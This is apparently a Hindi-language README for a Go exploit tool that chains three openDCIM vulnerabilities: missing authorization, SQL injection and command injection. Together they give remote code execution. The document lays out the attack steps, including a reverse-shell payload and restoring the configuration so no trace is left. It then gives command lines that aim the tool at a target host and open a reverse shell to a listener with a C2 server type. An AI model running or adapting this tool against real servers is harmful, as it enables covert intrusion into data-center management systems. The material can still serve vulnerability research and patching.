
openDCIM install.php SQLi से RCE श्रृंखला (CWE-862 + CWE-89 + CWE-78)
openDCIM के install.php LDAP कॉन्फ़िगरेशन फ़ॉर्म को लक्षित करने वाली रिमोट कोड निष्पादन श्रृंखला। VulnCheck go-exploit फ़्रेमवर्क पर आधारित।
| # | CVE | CWE | विवरण |
|---|---|---|---|
| 1 | CVE-2026-28515 | CWE-862 | install.php LDAP कॉन्फ़िग फ़ॉर्म से पहले कोई भूमिका जाँच नहीं करता - कोई भी उपयोगकर्ता उस तक पहुँच सकता है |
| 2 | CVE-2026-28516 | CWE-89 | Config::UpdateParameter() स्ट्रिंग इंटरपोलेशन का उपयोग करता है, PDO+MySQL के माध्यम से स्टैक्ड क्वेरी |
| 3 | CVE-2026-28517 | CWE-78 | report_network_map.php dot कॉन्फ़िग मान को सीधे exec() में पास करता है |
प्रभावित: सभी संस्करण (नवीनतम कमिट 4467e9c4 पर परीक्षण किया गया)
install.php पर POST करें - LDAP फ़ॉर्म के माध्यम से SQL इंजेक्शन कॉन्फ़िग का बैकअप लेता है, dot को कमांड पेलोड से ओवरराइट करता हैreport_network_map.php पर GET करें - exec() ट्रिगर करता है, id आउटपुट के माध्यम से RCE की पुष्टि करता हैinstall.php पर POST करें - dot को रिवर्स शेल पेलोड से ओवरराइट करता हैreport_network_map.php पर GET करें - रिवर्स शेल ट्रिगर करता हैinstall.php पर POST करें - बैकअप टेबल से सभी मूल कॉन्फ़िग मान पुनर्स्थापित करता हैशोषण के बाद डेटाबेस में कोई निशान नहीं बचता।
go build -o opendcim-exploit .
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80
# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer
| फ़्लैग | डिफ़ॉल्ट | विवरण |
|---|
-rhost | लक्ष्य होस्ट | |
-rport | 80 | लक्ष्य पोर्ट |
-ssl | false | HTTPS का उपयोग करें |
-lhost | लिसनर होस्ट (रिवर्स शेल के लिए) | |
-lport | लिसनर पोर्ट (रिवर्स शेल के लिए) | |
-c2 | C2 प्रकार: SimpleShellServer या SSLShellServer | |
-username | HTTP बेसिक ऑथ उपयोगकर्ता नाम (SetEnv डिप्लॉयमेंट के लिए छोड़ दें) | |
-password | HTTP बेसिक ऑथ पासवर्ड (SetEnv डिप्लॉयमेंट के लिए छोड़ दें) | |
-a | एसेट डिटेक्शन (जाँचें कि लक्ष्य शोषण योग्य है या नहीं) | |
-e | शोषण मोड |